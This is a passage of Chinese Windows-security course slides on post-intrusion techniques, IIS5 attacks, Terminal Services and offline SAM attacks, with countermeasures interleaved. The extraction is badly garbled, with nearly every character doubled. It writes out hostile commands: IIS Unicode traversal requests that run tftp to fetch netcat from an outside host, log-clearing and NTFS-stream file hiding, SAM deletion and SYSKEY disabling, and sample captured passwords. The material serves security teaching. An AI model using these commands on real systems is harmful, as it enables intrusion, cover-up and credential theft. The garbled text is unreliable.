117、 10.1.1.3 Connecting to remote machine 10.1.1.3 The operation completed successfully. 3.3. 使用使用ResourceKitResourceKit工具工具shutdownshutdown重新启动系统:重新启动系统: C:shutdown 10.1.1.3 /R /T:1 /Y /CCIWwindows系统安全(07)FakeGINAFakeGINA的安装的安装4.4. 等等待待用用户户登登录录,然然后后查查看看文文件件%SystemRoot%system32passlist.txt%SystemRoot%s
118、ystem32passlist.txt中中的的原原始始登登录录用用户户名名和和密密码码。假假设设攻攻击击者者已已经经将将C$C$共共享享映映射射为为他他的的I:I:驱动器:驱动器: I:WINNTsystem32type passlist.txt FRED-W2KSStu n0t4u2c FRED-W2KSAdministrator h4pped4ze 你你可可以以看看到到,用用户户StuStu的的密密码码为为“n0t4u2c”“n0t4u2c”,AdministratorAdministrator的的密密码码为为“h4pped4ze”“h4pped4ze”。攻攻击击者者在在收收集集了了这这个
119、个密密码码之之后后可可以以继继续续等等待待其其他他用用户的登录,并开始对网络的下一步攻击。户的登录,并开始对网络的下一步攻击。CIWwindows系统安全(07)嗅探工具嗅探工具SnifferSniffer FsniffFsniff DsniffDsniffforWin32forWin32EtherealEtherealCIWwindows系统安全(07)中继跳板中继跳板攻攻击击者者获获取取了了一一个个系系统统的的访访问问权权所所导导致致的的最最大大危危险险可可能能在在于于他他可可以以利利用用这这个个系系统统作作为跳板,从而进一步攻击其他的系统为跳板,从而进一步攻击其他的系统 这这种种利利用用
120、一一个个侵侵入入的的系系统统攻攻击击其其他他原原本本不不可可以以达达到到的的系系统统的的能能力力称称为为“中中继继跳跳板板”。这这对对攻攻击击者者的的好好处处在在于于他他们们的的攻攻击击可可以以扩扩展展到到很很大大的的范范围围,并并且且在在几几乎乎完完全全匿匿名名的的情况下情况下进行进行CIWwindows系统安全(07)端口重定向端口重定向一一旦旦攻攻击击者者攻攻取取了了一一个个目目标标之之后后,他他可可以以使使用用端端口口重重定定向向工工具具将将报报文文转转发发到到防防火火墙墙后后面面的的指指定定目目的的地地。基基本上,这种技术将防火墙变为了门闩。本上,这种技术将防火墙变为了门闩。 在在本
121、本质质上上,端端口口重重定定向向是是将将一一个个端端口口上上的的活活动动转转移移到到另另一一个个端端口口上上去去。当当防防火火墙墙允允许许10241024之之上上的的全全部部端端口口到到达达目目标标网网络络,而而阻阻塞塞WindowsWindows系系统统端端口口139139和和445445时时( (这这正正是是我我们们所所需需要要的的端端口口) ),这这正正是是需需要要使使用用这这种种技技术的情况术的情况CIWwindows系统安全(07)端口重定向工具端口重定向工具RinetdRinetd FpipeFpipeCIWwindows系统安全(07)CIWwindows系统安全(07)CIWw
122、indows系统安全(07)清除痕迹清除痕迹清除日志清除日志 隐藏文件隐藏文件 通用对策通用对策CIWwindows系统安全(07)清除日志清除日志如如果果能能够够进进行行交交互互式式访访问问,只只需需简简单单地地打打开开MMCMMC管管理理单单元元,找找到到SystemSystemTools/EventTools/EventViewerViewer,右右 键键 单单 击击 SecuritySecurity LogLog并并 选选 择择 ClearClear AllAllEvents(Events(清除全部事件清除全部事件) )就可以达到目的就可以达到目的 或或 者者 , 可可 以以 使使 用
123、用 来来 自自 JesperJesper LauritsenLauritsen的的elsaveelsave工工具具,它它是是一一个个用用于于清清除除事事件件日日志志的的小小工具工具CIWwindows系统安全(07)清除日志清除日志elsave C:elsave -sjoel -1“security” c 这这些些方方法法都都可可以以清清除除所所有有的的日日志志记记录录,但但是是会会留留下下一一条条新的记录,表明事件日志被进行操作的账户清除了新的记录,表明事件日志被进行操作的账户清除了 解解决决这这个个问问题题的的隐隐蔽蔽方方法法可可以以通通过过ATAT命命令令以以SYSTEMSYSTEM身身
124、份份运运行行compmgmt.msccompmgmt.msc,然然后后再再删删除除事事件件日日志志。表表明明日日志志被被删删除除的的记记录录仍仍然然会会出出现现,但但是是执执行行清清除除操操作作的的账账户户会会被被认为是认为是SYSTEMSYSTEM,这使得很难调查真正的肇事者,这使得很难调查真正的肇事者CIWwindows系统安全(07)清除日志清除日志WinZapper来来 自自 ntsecurity.nuntsecurity.nu的的 ArneArneVidstromVidstrom的的WinZapperWinZapper是另一个有趣的工具是另一个有趣的工具 WinZapperWinZa
125、pper能能够够有有选选择择地地删删除除WindowsWindowsNT/2000NT/2000安安全全日日志志中中的的事事件件记记录录项项目目。在在进进行行删删除除操操作作之后,它需要重新启动系统之后,它需要重新启动系统CIWwindows系统安全(07)隐藏文件隐藏文件Attrib+r+h+sAttrib+r+h+s流文件流文件 ElitewrapElitewrapCIWwindows系统安全(07)流文件流文件NTFSNTFS上上的的所所有有文文件件都都是是以以数数据据流流的的形形式式存存储储的的。因此,攻击者可以利用流来隐藏文件因此,攻击者可以利用流来隐藏文件 流流功功能能是是为为了了
126、允允许许为为文文件件添添加加属属性性而而设设计计的的,但但不不幸幸的的是是,这这个个“功功能能”也也可可以以被被用用来来隐隐藏藏恶意黑客的恶意黑客的rootkitrootkit文件文件 为为在在NTFSNTFS流流中中隐隐藏藏文文件件,可可用用NTNTResourceResourceKitKit中的中的cp.execp.exe工具工具CIWwindows系统安全(07)流文件处理流文件处理C:cp nc.exe winntsystem32kernel32.dll:nc.exe 然后删除原始文件:然后删除原始文件: C:del nc.exe 现在文件就从系统中消失了。宿主文件现在文件就从系统中消
127、失了。宿主文件(kernel32.dll)(kernel32.dll)的大小并没有改的大小并没有改变。只是变。只是 硬盘上总的剩余空间减小了。硬盘上总的剩余空间减小了。 为了从宿主文件中提取寄生文件,仍然使用为了从宿主文件中提取寄生文件,仍然使用cpcp命令:命令: C:cp winntsystem32kernel32.dll:nc.exe nc.exe 因为这是因为这是NTFSNTFS的一项功能,如果不知情的管理员将这个文件的一项功能,如果不知情的管理员将这个文件(kernel32.dll)(kernel32.dll)复制到其他的复制到其他的NTFSNTFS分区上,寄生的文件会随之移动分区上
128、,寄生的文件会随之移动CIWwindows系统安全(07)Elitewrap很很多多黑黑客客用用来来隐隐藏藏文文件件的的另另一一项项技技术术是是将将它它们们组组合合到到一一个个自自执执行行的的木木马马程程序序中中,然然后后将将其其改改名为无害的名称名为无害的名称 ElitewrapElitewrap就就是是一一个个著著名名的的木木马马创创建建工工具具,它它可可以以将将一一定定数数量量的的文文件件包包装装到到一一个个单单一一的的可可执执行行文件中,稍后这个文件可以散布并加以利用文件中,稍后这个文件可以散布并加以利用CIWwindows系统安全(07)通用对策端口监听通用对策端口监听Netstat
129、NetstatananFportFport 木马端口列表木马端口列表 http:/ CIWwindows系统安全(07)CIWwindows系统安全(07)查找恶意进程查找恶意进程pulistpulist sclistsclist 注意:恶意代码可以改名注意:恶意代码可以改名CIWwindows系统安全(07)监视文件系统监视文件系统维维护护一一份份文文件件和和目目录录的的完完整整列列表表,定定期期地地进进行行更更新新和和对对比比,这这可可能能会会加加重重过过度度操操劳劳的的管管理理员员的的负负担担,但但是是,如如果果系系统统的的状状态态不不是是经经常常变变动动的的话话,这这是是发发现现很很多
130、多恶恶意意行行为为踪踪迹迹最最有有效效的的方方法法 WindowsWindows20002000提提供供了了WindowsWindows文文件件保保护护(Windows(Windows,WFP)WFP)功功能能,它它能能够够保保护护由由安安装装程程序序所所安安装装的的系统文件不会被覆盖系统文件不会被覆盖CIWwindows系统安全(07)监视文件系统第三方工具监视文件系统第三方工具可可供供选选择择的的第第三三方方工工具具还还包包括括MD5sumMD5sum,它它是是GNUGNU通通用用公公共共许许可可证证之之下下的的TextutilsTextutils软软件件包包中中的的一一个文件完整性检查工
131、具个文件完整性检查工具 通通过过使使用用MD5MD5算算法法,MD5sumMD5sum能能够够计计算算和和验验证证文文件件的的128128位消息摘要位消息摘要CIWwindows系统安全(07)审核、帐户和日志维护审核、帐户和日志维护打开警报器,打开警报器,尽早尽早发现进攻发现进攻 经常地检查日志的内容经常地检查日志的内容 定定期期地地对对日日志志进进行行存存档档,以以避避免免丢丢失失重重要要的的证证据据 注注意意观观察察可可疑疑的的账账户户修修改改:使使用用第第三三方方工工具具来来辅辅助助完完成成这这方方面面的的工工作作。例例如如,SomarsoftSomarsoft的的DumpSecDum
132、pSec( (原原来来的的DumpACLDumpACL) )、DumpRegDumpReg和和DumpEvtDumpEvt通通过过简简单单的的命命令令语语法法就就可可以以很很出出色色地地捕捕获获Windows2000Windows2000系统的所有相关信息系统的所有相关信息CIWwindows系统安全(07)CIWwindows系统安全(07)CIWwindows系统安全(07)操作系统安全Windows 系统安全(三)CIWwindows系统安全(07)目目 录录 IIS5IIS5的安全的安全 终端服务器安全终端服务器安全 Microsoft Internet Microsoft Inter
133、net 客户端的安全客户端的安全 物理攻击物理攻击 CIWwindows系统安全(07)IIS5IIS5的安全的安全CIWwindows系统安全(07)IIS5IIS5基础基本基础基本HTTPHTTPHTTPHTTP:基于文本的无状态文件传输协议:基于文本的无状态文件传输协议 http:/http:/虚虚拟拟目目录录:filesfiles映映射射到到该该系系统统磁磁盘盘的的一一个个实实际际目目录录上,如上,如c:inetpubfilesc:inetpubfiles对于服务器而言则形成如下的请求:对于服务器而言则形成如下的请求: GET/GET/ind.htmind.htmHTTP/1.0HTT
134、P/1.0若若该该文文件件存存在在,则则服服务务器器会会向向客客户户端端推推送送该该文文件件并并在在客户端的浏览器上显示;否则会有各种错误代码客户端的浏览器上显示;否则会有各种错误代码CIWwindows系统安全(07)IIS5IIS5基础基础CGICGICGICGI:CommonCommonGatewayGatewayInterfaceInterface,运运行行在在服服务务器器上上的的应应用用程程序序,能能针针对对每每个个请请求求生生成成动动态态的的内内容容,扩扩展展了了WebWeb功功能能 调用调用CGICGI WindowsWindows中中几几乎乎所所有有的的可可执执行行程程序序都都
135、可可以以作作为为服服务务器器端端的的CGICGI应用程序来执行应用程序来执行 其中其中cmd.execmd.exe经常被作为寻找的目标经常被作为寻找的目标CIWwindows系统安全(07)IIS5IIS5基础基础ASPASP和和ISAPIISAPIASPASP:ActiveServerPagesActiveServerPagesISAPI:InterfaceServerApplicationProgrammingInterfaceISAPI:InterfaceServerApplicationProgrammingInterface调用调用ASPASP 调用调用ISAPIISAPIhttp:
136、/http:/?var1&var2?var1&var2CIWwindows系统安全(07)HTTPHTTP攻击伎俩攻击伎俩使用使用././进行文件系统遍历进行文件系统遍历 URLURL的十六进制编码的十六进制编码CIWwindows系统安全(07)使用使用././进行文件系统遍历进行文件系统遍历http:/http:/ 通常是在目录上设置不当的通常是在目录上设置不当的NTFSNTFS访问控制列表所导致的访问控制列表所导致的 http:/http:/samsamCIWwindows系统安全(07)URLURL的十六进制编码的十六进制编码HttpHttp允许允许URLURL中使用十六进制编码形式输
137、入字符串中使用十六进制编码形式输入字符串 CIWwindows系统安全(07)利用利用URLURL的十六进制编码攻击的十六进制编码攻击http:/http:/samsam http:/http:/ 2F2F2E2E2E2E2F2F2E2E2E2E2F2Fwinnt/repair/winnt/repair/samsam 能能避避免免入入侵侵检检测测系系统统的的检检测测,或或可可以以导导致致应应用用程程序序错错误误处处理输入理输入CIWwindows系统安全(07)IIS5IIS5缓冲区溢出缓冲区溢出IPPIPP缓冲区溢出缓冲区溢出 索引服务索引服务ISAPIISAPI扩展缓冲区溢出扩展缓冲区溢出
138、 CodeRedCodeRed蠕虫蠕虫 ida/idqida/idq缓冲区溢出缓冲区溢出 FrontPage2000FrontPage2000服务器扩展缓冲区溢出服务器扩展缓冲区溢出CIWwindows系统安全(07)安全对策安全对策在系统驱动器之外的驱动器上安装在系统驱动器之外的驱动器上安装WebWeb文件夹文件夹 WebWeb服务器所在的卷应使用服务器所在的卷应使用NTFSNTFS并谨慎设置并谨慎设置ACLACL移移 动动 、 删删 除除 或或 改改 名名 可可 能能 被被 利利 用用 的的 可可 执执 行行 文文 件件 :cacls,xcaclscacls,xcacls 在在服服务务器器
139、的的WriteWrite和和ExecuteExecute ACLACL中中删删除除EveryoneEveryone和和UsersGroupUsersGroup掌握对日志中攻击标志的分析掌握对日志中攻击标志的分析CIWwindows系统安全(07)将文件写入将文件写入WebWeb服务器服务器如在目标机上建立如在目标机上建立tftptftp服务器,然后上载文件:服务器,然后上载文件: GET/scripts/.%c0%af./winnt/system32/t?“-GET/scripts/.%c0%af./winnt/system32/t?“-i”+192.168.234.31+GET+nc.exe
140、i”+192.168.234.31+GET+nc.exec:nc.exec:nc.exeHTTP/1.0HTTP/1.0将将netcatnetcat写入到写入到C:C:,因为默认情况下所有用户对,因为默认情况下所有用户对C:C:具有写权限具有写权限 如将目标机器上如将目标机器上cmd.execmd.exe改名为改名为cmdl.execmdl.exe GETGET/scripts/.%c0%af./winnt/system32/cmd.exe?+copy+/scripts/.%c0%af./winnt/system32/cmd.exe?+copy+c:winntsystem32cmd.exe+c
141、:cmdl.exeHTTP/1.0c:winntsystem32cmd.exe+c:cmdl.exeHTTP/1.0其它自动上载工具:如其它自动上载工具:如unicodeloaderunicodeloader等等CIWwindows系统安全(07)通过通过IIS5IIS5提升权限提升权限通通过过InProcesslsapiAppsInProcesslsapiApps利利用用RevertToSelfRevertToSelf 安装安装MS01-026MS01-026补丁可以解决补丁可以解决 CIWwindows系统安全(07)源代码泄漏攻击源代码泄漏攻击起因起因 IISIIS中的程序缺陷中的程序缺
142、陷 低劣的低劣的WebWeb编程技术编程技术 常见的漏洞常见的漏洞 +.+.htr(ism.dllhtr(ism.dll)Webhits(webhits.dllWebhits(webhits.dll)Translate:f(Translate:f(WebDAVWebDAV,httpext.dllhttpext.dll)WebDAVWebDAV目录列表(目录列表(httpext.dllhttpext.dll) )CIWwindows系统安全(07)WebWeb服务器安全评估工具服务器安全评估工具StealthHTTPScannerStealthHTTPScannerSSLProxySSLProx
143、yhttp:/http:/Products/ProductsAchillesAchilles WfetchWfetch WhiskerWhiskerCIWwindows系统安全(07)WebWeb服务器安全忠告服务器安全忠告在在路路由由器器、防防火火墙墙或或其其它它位位于于WebWeb服服务务器器周周边边位位置置的的设设备备上上应应用用网网路级的访问控制路级的访问控制 在主机级,阻塞在主机级,阻塞WebWeb服务器上所有不必要的流入和流出连接服务器上所有不必要的流入和流出连接 随时安装热修复:随时安装热修复:technettechnet/security/security删除不必要的脚本映射和
144、不使用的删除不必要的脚本映射和不使用的ISAPIISAPI应用程序应用程序DLLDLL禁用不必要的服务禁用不必要的服务 在在应应用用WebWeb服服务务之之前前,强强烈烈推推荐荐使使用用SecuritySecurityTemplateTemplate来来对对其其进进行行配置配置CIWwindows系统安全(07)WebWeb服务器安全忠告服务器安全忠告在系统卷之外建立一个独立的卷来存放在系统卷之外建立一个独立的卷来存放WebWeb根目录根目录 WebWeb服服务务器器所所在在的的卷卷应应使使用用NTFSNTFS文文件件系系统统,明明确确的的设设置置ACLACL删删除除EveryoneEvery
145、one、UsersUsers和和其其它它非非特特权权组组所所在在目目录录上上的的写写文件和执行文件权限文件和执行文件权限 不要将私有数据保存在不要将私有数据保存在ASPASP文件或包含有文件中文件或包含有文件中 停停 止止 AdministrationAdministration WebWeb站站 点点 , 删删 除除 IISAdminIISAdmin和和IISHelpIISHelp虚拟目录以及它们对应的真实目录虚拟目录以及它们对应的真实目录 CIWwindows系统安全(07)终端服务器安全终端服务器安全CIWwindows系统安全(07)TSWindowsWindows20002000提提
146、供供了了交交互互式式的的图图形形化化远远程程shellshell,称称为为终终端端服服务务(Terminal(TerminalServiceService,TS)TS),适适用用于于远远程程管管理理或或应应用用程序共享程序共享 引引用用的的说说法法,“WindowsWindows20002000终终端端服服务务使使你你能能够够从从各各种种设设备备上上,通通过过几几乎乎任任何何类类型型的的网网络络连连接接远远程程的的基基于于WindowsWindows20002000的服务器,并在其上远程执行应用程序的服务器,并在其上远程执行应用程序” CIWwindows系统安全(07)TSTSTS紧紧密密集
147、集成成在在操操作作系系统统内内部部,免免费费提提供供远远程程管管理理模模式式( (最最多多有有两两个个同同时时连连接接的的会会语语以以及及一一个个控控制制台台)TSTS可可以以在在你你和和服服务务器器之之间间提提供供不不同同的的认认证证和和加加密密方方法法。对对WindowsWindows20002000来来说说,终终端端服服务务器器正正在在逐逐渐渐成成为为与与UNIXUNIX世世界界中中的的SSHSSH一一样样重重要要的的图图形形化化产产品品CIWwindows系统安全(07)TS的代价的代价在在本本节节中中,我我们们将将从从安安全全的的角角度度来来考考查查TSTS的的基基本本功功能能、如如
148、何何识识别别和和枚枚举举TSTS、解解决决不不合合理理的的TSTS实实现现的的问问题题、已已知知的的针针对对TSTS的的攻攻击击,以以及及在在网网络络环环境中保护和管理境中保护和管理TSTS的基本知识的基本知识CIWwindows系统安全(07)TS组件组件服务器服务器 远远程程桌桌面面协协议议(Remote(Remote DesktopDesktop ProtocolProtocol,RDP)RDP)客户端客户端CIWwindows系统安全(07)CIWwindows系统安全(07)远程桌面协议远程桌面协议(RDP)在在 客客 户户 端端 和和 服服 务务 器器 之之 间间 的的 数数 据据
149、 传传 输输 是是 通通 过过MicrosoftMicrosoft的的基基于于TCPTCP的的远远程程桌桌面面协协议议(RDP-5)(RDP-5)进进行行的的 RDPRDP提提供供了了三三层层加加密密以以确确保保点点对对点点数数据据传传输输的的安安全全性:性:4040、5656或或128128位位RC4RC4与与WindowsWindowsNTNT版版本本的的RDP-4RDP-4相相比比,WindowsWindows20002000提提供供了了更更多多的的基基本本功功能能,可可以以在在大大多多数数的的网网络络环环境境中中高效的使用高效的使用CIWwindows系统安全(07)客户端客户端通通过
150、过MSMS安安装装程程序序(MSI)(MSI)软软件件包包安安装装的的独独立立的的1616位位或或3232位位可可执行文件执行文件 终终端端服服务务高高级级客客户户端端(Terminal(Terminal ServicesServices AdvancedAdvancedAlientAlient,TSAC)TSAC),基基于于Win32Win32的的ActiveXActiveX控控件件,可可以以在在WebWeb页页面中使用面中使用 MMCMMC管理单元管理单元 尽尽管管它它们们互互相相之之间间存存在在明明显显的的区区别别,但但各各种种不不同同的的客客户户端端都都用用完完全全相相同同的的方方法法
151、来来实实现现RDPRDP。因因此此,尽尽管管它它们们看看起起来来似似乎乎不不一一样样,但但所所有的有的TSTS客户端在与服务器进行对话时都以完全相同的方式进行操作客户端在与服务器进行对话时都以完全相同的方式进行操作CIWwindows系统安全(07)修改修改TSTS监听端口服务器端监听端口服务器端通通过过修修改改下下面面的的注注册册表表键键值值,TSTS的的默默认认端端口口可可以以重新指定重新指定 HKLMSystemCurrentControlSetControl Terminal Server WinStationsRDP-Tcp键值:键值:PortNumber REG_DWORD=338
152、9CIWwindows系统安全(07)修改修改TSTS监听端口客户端监听端口客户端第第一一步步是是在在TSTS客客户户端端连连接接管管理理器器中中与与目目标标主主机机建建立立连连接接 一一旦旦创创建建了了一一个个连连接接之之后后,选选定定该该连连接接并并从从FileFile菜菜单单中中选选择择ExportExport,将将全全部部配配置置设设置置保保存存到到以以一一个个CNSCNS为为扩展名的文本文件中去扩展名的文本文件中去 使使用用文文本本编编辑辑器器打打开开这这个个文文件件,将将ServerServerPortPort修修改改为为在在服服务务器器上上指指定定端端口口,如如下下例例所所示示(
153、 (自自定定义义连连接接端端口为口为7777)7777) CIWwindows系统安全(07)修改修改TSTS监听端口客户端监听端口客户端CorpTermServ WinPosStr=0,2,0,0,941,639 Expand=1 Smooth Scrolling=0 Shadow Bitmap Enabled=1 Dedicated Terminal=0 Server Port=7777 Enable Mouse=1 etc. CIWwindows系统安全(07)识别和查找识别和查找TSTS33893389端口扫描端口扫描 TSProbeTSProbe TSEnumTSEnum CIWwi
154、ndows系统安全(07)攻击攻击TSTS密码猜测攻击密码猜测攻击 用户权限提升用户权限提升 畸形畸形RDPRDP拒绝服务攻击拒绝服务攻击 CIWwindows系统安全(07)密码猜测攻击密码猜测攻击-TSGrinder.exe-TSGrinder.exeTSTS登登录录等等价价于于真真正正的的交交互互式式登登录录,因因此此对对真真正正的的AdministratorAdministrator账账户户是是不不能能设设置置锁锁定定阈阈值值的的。这这意意味味着着在在启启用用了了TSTS服服务务的的情情况况下下,对对密密码码猜猜测测攻攻击击来来说说,本本地地AdministratorAdministr
155、ator账户是一个最易受攻击的目标账户是一个最易受攻击的目标 TimTimMullenMullen开开发发了了TSGrinderTSGrinder的的工工具具,它它能能够够通通过过TSTS对对本地本地AdministratorAdministrator账户进行字典攻击账户进行字典攻击 CIWwindows系统安全(07)密码猜测攻击密码猜测攻击-TSGrinder.exe-TSGrinder.exeTSGrinderTSGrinder使使用用TSTS的的ActiveXActiveX控控件件来来进进行行攻攻击击。尽尽管管这这个个ActiveXActiveX控控件件经经过过特特殊殊的的设设计计可可
156、以以拒拒绝绝对对密密码码方方法法的的脚脚本本访访 问问 , 但但 通通 过过 C+C+中中 的的 vtablevtable绑绑 定定 仍仍 然然 可可 以以 访访 问问ImsTscNonScriptableImsTscNonScriptable接接口口方方法法。这这允允许许为为该该控控件件编编写写自自定定义义的的接接口口,于于是是攻攻击击者者就就可可以以对对AdministratorAdministrator账账户户进进行密码猜测,直至猜测出密码行密码猜测,直至猜测出密码 上提供下载上提供下载 CIWwindows系统安全(07)密码猜测攻击的防御密码猜测攻击的防御推荐将本地推荐将本地Admi
157、nistratorAdministrator账户改名账户改名 防防御御TSTS密密码码猜猜测测攻攻击击的的另另一一种种有有趣趣的的方方法法是是为为WindowsWindows登登录录窗窗口口制制作作一一个个自自定定义义的的法法律律声声明明,通通过添加或编辑如下的注册表键值就可以实现:过添加或编辑如下的注册表键值就可以实现: HKLMSOFTWAREMicrosoftWindowsNTCurrentVersionWinLogon CIWwindows系统安全(07)用户权限提升用户权限提升推推荐荐实实现现WindowsWindows20002000ResourceResourceKitKit中中
158、的的一一些些关关键功能键功能 其其中中最最重重要要的的是是,“AppsecAppsec”可可以以使使管管理理员员能能够够限制用户只能运行特定的应用程序限制用户只能运行特定的应用程序 这这能能够够减减小小攻攻击击者者在在获获取取本本地地用用户户访访问问之之后后进进行行权限提升攻击的危险权限提升攻击的危险 CIWwindows系统安全(07)IMEIME远程远程RootRoot获取获取输输入入法法编编辑辑器器(Input(InputMethodMethodEditorEditor,IME)IME)漏漏洞洞,这这个个漏漏洞导致可以不用提供任何凭据就能通过洞导致可以不用提供任何凭据就能通过TSTS的认
159、证的认证 IMEIME用用来来将将标标准准的的101101键键键键盘盘映映射射到到某某种种语语言言中中的的大大量量可可用用字字符符,例例如如日日语语、中中文文和和韩韩国国语语都都需需要要IMEIME。虽虽然然IMEIME通通常常在在本本地地用用户户的的上上下下文文中中进进行行正正常常操操作作,但但登登录录时时,IMEIME却却在在SYSTEMSYSTEM上上下下文文中中运运行行。这这使使得得通通过过远远程程服服务务器器的的登登录录屏屏幕运行精心设计的命令成为可能幕运行精心设计的命令成为可能CIWwindows系统安全(07)IMEIME对策对策只只有有简简体体中中文文版版系系统统或或在在初初始
160、始安安装装过过程程中中安安装装了了简体中文简体中文IMEIME的系统才会有这个漏洞的系统才会有这个漏洞 MicrosoftMicrosoft发发布布的的公公告告MS00-069MS00-069和和补补丁丁能能够够为为所所有有受影响的版本解决这个问题受影响的版本解决这个问题CIWwindows系统安全(07)畸形畸形RDPRDP拒绝服务拒绝服务20012001年年1 1月月,YoichiYoichiUbukataUbukata和和YoshihiroYoshihiroKawabataKawabata发发现现了了RDPRDP中中的的一一个个漏漏洞洞,这这个个漏漏洞洞可可能能导导致致拒拒绝绝服服务务的
161、的情情况况出出现现。如如果果攻攻击击者者发发送送一一种种畸畸形形的的报报文文,它它将将使使RDPRDP瘫瘫痪痪。这这种种攻攻击击会会导导致致当当前前正正在在进进行行的的全全部部工工作作丢丢失失,并并且且需需要要重新启动系统才能恢复服务重新启动系统才能恢复服务 MicrosoftMicrosoft发发布布了了一一个个补补丁丁(MS01-006)(MS01-006),通通过过修修改改终终端端服服务器服务使它正确地处理数据,从而消除这个漏洞务器服务使它正确地处理数据,从而消除这个漏洞CIWwindows系统安全(07)物理攻击物理攻击CIWwindows系统安全(07)物理攻击物理攻击如如果果入入侵
162、侵者者能能够够不不受受限限制制地地在在物物理理上上访访问问一一台台Windows2000Windows2000系统,那么他们如何进行攻击呢?系统,那么他们如何进行攻击呢? 本本节节将将从从物物理理的的角角度度探探讨讨攻攻击击者者如如何何从从WindowsWindows20002000获获取取数数据据,通通常常的的方方法法是是引引导导到到另另外外的的操操作作系系统并在离线的状态下对系统的属性进行编辑统并在离线的状态下对系统的属性进行编辑CIWwindows系统安全(07)对对SAMSAM进行离线攻击进行离线攻击破破解解通通常常依依赖赖于于获获取取NT/2000NT/2000的的密密码码数数据据库
163、库安安全全账账户管理器户管理器(SecurityAccountsManager(SecurityAccountsManager,SAM)SAM)文件文件 通通过过离离线线攻攻击击,SAMSAM的的内内容容也也可可以以被被坏坏人人获获取取,只只需需引引导导到到另另一一种种操操作作系系统统,然然后后将将SAMSAM复复制制到到可可移移动动媒媒体或网络共享中体或网络共享中 首首先先介介绍绍一一些些经经典典的的离离线线攻攻击击技技术术,然然后后分分析析这这些些攻攻击击对对EFSEFS潜潜在在的的影影响响。最最后后,讨讨论论EFSEFS攻攻击击的的一一个个例例子,它不需要在离线状态下访问系统子,它不需要
164、在离线状态下访问系统CIWwindows系统安全(07)通过删除通过删除SAMSAM废除废除AdministratorAdministrator密码密码通通过过在在系系统统处处于于离离线线状状态态时时删删除除SAMSAM文文件件,然然后后就就可可以以在在系系统统重重新新启启动动后后以以空空密密码码登登录录AdministratorAdministrator账账户户。这这种种方方法法同同时时也也删删除除了了目目标标系系统统上上所所有有现现有有的的用用户户账账户户,但但与与磁磁盘盘上上的的重重要要数数据据相相比比,攻攻击击者者并并不考虑这一点不考虑这一点 这这种种攻攻击击有有多多种种实实现现方方式
165、式,但但最最直直接接的的方方法法是是制制作作一一张张 可可 引引 导导 的的 DOSDOS系系 统统 软软 盘盘 , 并并 将将 SysinternalSysinternal的的ntfsdosprontfsdospro复复制制到到软软盘盘上上。然然后后这这张张软软盘盘就就可可以以用用来将目标系统引导到来将目标系统引导到DOSDOSCIWwindows系统安全(07)通过删除通过删除SAMSAM废除废除AdministratorAdministrator密码密码如如果果目目标标系系统统使使用用FATFAT或或FAT32FAT32,那那么么只只需需输输入入以以下下命命令就可以删除令就可以删除SAM
166、SAM文件:文件: A:del c:winntsystem32configsam 如如果果目目标标系系统统使使用用NTFSNTFS文文件件系系统统,那那么么可可以以使使用用ntfsdosprontfsdospro将将NTFSNTFS卷卷装装载载到到DOSDOS中中,然然后后使使用用相相同同的的命令来删除命令来删除SAMSAMCIWwindows系统安全(07)通过删除通过删除SAMSAM废除废除AdministratorAdministrator密码密码当当系系统统稍稍后后重重新新启启动动时时,WindowsWindows20002000将将重重新新创创建建一一个个默默认认的的SAMSAM文文
167、件件,它它含含有有AdministratorAdministrator账账户户,而而且且密密码码为为空空。只只需需使使用用这这个个账账户户和和密密码码登登录录,就就可可以获得对系统的全面控制以获得对系统的全面控制 这这里里需需要要注注意意的的是是,删删除除SAMSAM并并不不会会影影响响WindowsWindows20002000域域控控制制器器,因因为为它它们们没没有有把把密密码码散散列列保保存存在在SAMSAM中中。然然而而,GraceGrace和和BartlettBartlett的的文文章章指指出出了了一一种种方方法法,通通过过在在域域控控制制器器上上安安装装另另一一份份WindowsW
168、indows20002000,就就可可以获得基本相同的效果以获得基本相同的效果CIWwindows系统安全(07)通过使用通过使用chntpwchntpw对对SAMSAM进行散列注入进行散列注入如如果果你你希希望望使使用用更更为为成成熟熟的的物物理理攻攻击击方方法法,不不想想破破坏坏掉掉系系统统中中全全部部的的账账户户,可可以以使使用用一一张张LinuxLinux引引导导软软盘盘和和PetterPetter NordahlNordahl-Hagen-Hagen的的chntpwchntpw,在在离离线线状状态态将将密码散列注入到密码散列注入到SAMSAM中中 即即使使在在应应用用了了SYSKEY
169、SYSKEY时时,或或即即使使选选择择了了用用密密码码来来保保护护SYSKEYSYSKEY或或将将它它保保存存在在软软盘盘上上的的选选项项,注注入入仍仍然然能能够够奏效奏效!CIWwindows系统安全(07)通过使用通过使用chntpwchntpw对对SAMSAM进行散列注入进行散列注入PetterPetter说说明明了了如如何何将将SYSKEYSYSKEY关关闭闭。更更糟糟的的是是,他他发发现现攻攻击击者者并并不不需需要要这这样样做做只只需需将将旧旧的的、未未经经SYSKEYSYSKEY处处理理的的散散列列直直接接注注入入到到SAMSAM中中,在在重新启动后,它就会自动被转换为重新启动后,
170、它就会自动被转换为SYSKEYSYSKEY散列散列CIWwindows系统安全(07)关闭关闭SYSKEYSYSKEY的方法的方法1.将将 HKLMSystemCurrentControlSetControlLsaSecureBootHKLMSystemCurrentControlSetControlLsaSecureBoot设设置置为为0 0以以禁禁用用SYSKEY(SYSKEY(这这个个键键的的可可能能取取值值为为:00禁禁用用;11不不受受保保护护的的密密钥钥保保存存在在注注册册表表中中;22密密钥钥保保存存在在注注册册表表中中,受受密密码码保保护护;33密钥保存在软盘上密钥保存在软盘上
171、)2.2. 将将二二进进制制结结构构HKLMSAMDomainsAccountFHKLMSAMDomainsAccountF中中的的一一个个特特殊殊标标志志位位修修改改为为以以前前SecureBootSecureBoot的的相相同同模模式式。在在系系统统处处于于运运行行状状态态时时,这这个主键是不能访问的个主键是不能访问的 3.3. 在在WindowsWindows20002000中中,HKLMsecurityPolicyPolSecretEncryptionKeyHKLMsecurityPolicyPolSecretEncryptionKey 主主键也需要被修改为与以前的两个主键相同的值键也
172、需要被修改为与以前的两个主键相同的值CIWwindows系统安全(07)通过使用通过使用chntpwchntpw对对SAMSAM进行散列注入进行散列注入根根据据PetterPetter的的说说法法,在在NTNT44SP6SP6之之前前的的系系统统上上只只修修改改前前两两个个值值中中的的一一个个会会导导致致在在完完全全引引导导之之后后出出现现一一个个警警告告,指指出出SAMSAM和和系系统统设设置置之之间间的的不不 一一 致致 性性 , SYSKEYSYSKEY会会 被被 重重 新新 启启 用用 。 而而 在在WindowsWindows20002000上上,在在重重新新启启动动之之后后,这这3 3个个键键值之间的不一致似乎直接被重置为最可能的值值之间的不一致似乎直接被重置为最可能的值CIWwindows系统安全(07)
